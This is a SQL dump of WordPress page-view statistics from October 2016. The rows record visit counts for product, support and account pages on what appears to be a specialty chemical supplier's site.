INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-20', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-20', 2, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/', '2016-10-20', 4, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-407/?wc-ajax=get_refreshed_fragments', '2016-10-20', 2, 1111); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-20', 2, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-20', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-20', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-21', 1822, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-21', 98, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-21', 6, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-21', 59, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-21', 64, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-21', 8, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-21', 7, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-21', 21, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-21', 36, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-21', 10, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-21', 21, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-21', 4, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-21', 4, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-21', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-21', 8, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-21', 7, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-21', 3, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-21', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-21', 3, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-21', 2, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles', '2016-10-21', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-21', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-21', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-21', 6, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-21', 3, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-21', 10, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-21', 4, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters', '2016-10-21', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-21', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-21', 4, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-21', 1, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720l/', '2016-10-21', 1, 1707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-21', 26, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-21', 1, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-201/', '2016-10-21', 1, 769); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-21', 2, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox', '2016-10-21', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-21', 4, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-21', 5, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-21', 3, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-21', 3, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-813/', '2016-10-21', 3, 903); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-21', 5, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-21', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/', '2016-10-21', 2, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-21', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-21', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-21', 2, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-21', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-21', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-21', 2, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-21', 2, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-21', 2, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-21', 8, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-21', 14, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-21', 3, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-21', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-21', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids', '2016-10-21', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-21', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/', '2016-10-21', 3, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-21', 6, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-21', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-21', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-21', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-21', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-21', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-21', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-21', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-21', 3, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-21', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-21', 7, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/urethane-coating/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 736); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/', '2016-10-21', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdz/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 696); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-21', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-21', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-21', 6, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-21', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-21', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-21', 3, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-21', 2, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/', '2016-10-21', 1, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-21', 10, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a0/', '2016-10-21', 1, 992); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a4/', '2016-10-21', 1, 997); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a4/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 997); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-3000/', '2016-10-21', 1, 968); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-3000/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 968); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-21', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-21', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-21', 3, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-21', 5, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-21', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-21', 3, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents', '2016-10-21', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-silicone-lubricant/', '2016-10-21', 1, 1819); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-813/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 903); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a6/', '2016-10-21', 1, 999); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a6/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 999); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-10-21', 1, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-21', 2, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-21', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-21', 2, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-21', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-21', 2, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-smt/', '2016-10-21', 1, 2226); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-21', 2, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-21', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-21', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-21', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/?wc-ajax=get_refreshed_fragments', '2016-10-21', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-102/', '2016-10-21', 2, 437); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-21', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-21', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-21', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-22', 225, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-22', 3, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/?wc-ajax=get_refreshed_fragments', '2016-10-22', 3, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-22', 13, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-22', 2, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=1117', '2016-10-22', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-22', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-22', 2, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-22', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-22', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-severe-service-grease/', '2016-10-22', 2, 1104); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-22', 3, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-22', 31, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-22', 11, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-22', 18, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-22', 13, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/110xn/', '2016-10-22', 1, 1662); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-22', 2, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-22', 5, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-22', 3, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-22', 3, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-22', 15, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-22', 8, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-22', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-22', 3, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-22', 3, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-22', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-22', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-760762/', '2016-10-22', 1, 1708); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tribosys-110xnb/', '2016-10-22', 1, 1664); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-agl-683/', '2016-10-22', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-agl-683/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-22', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-22', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-22', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-22', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-22', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/', '2016-10-22', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-sion/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-22', 7, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-22', 1, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-22', 1, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-22', 3, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/?wc-ajax=get_refreshed_fragments', '2016-10-22', 3, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?print=y', '2016-10-22', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-10-22', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-22', 1, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-22', 1, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-62/', '2016-10-22', 1, 1216); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-62/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 1216); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-22', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-22', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-22', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-22', 1, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-22', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-22', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-23', 229, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-23', 18, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-23', 6, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-23', 16, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-23', 13, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-23', 28, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-23', 10, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-23', 6, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-23', 2, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-23', 14, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-23', 3, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/', '2016-10-23', 3, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-23', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/', '2016-10-23', 4, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1344); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-23', 2, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-23', 17, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-23', 2, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-23', 2, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-23', 10, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-23', 2, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-23', 3, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-23', 4, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/lost-password/', '2016-10-23', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-23', 1, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-23', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-noise-vibration-harshness/', '2016-10-23', 2, 2450); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-23', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-23', 2, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-23', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-23', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-23', 1, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-23', 1, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-23', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-corrugator-greases/', '2016-10-23', 1, 2308); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-23', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-23', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-23', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-23', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-23', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-for-injection-molding/', '2016-10-23', 1, 1115); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-23', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', '2016-10-23', 1, 662); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-23', 1, 2474); 
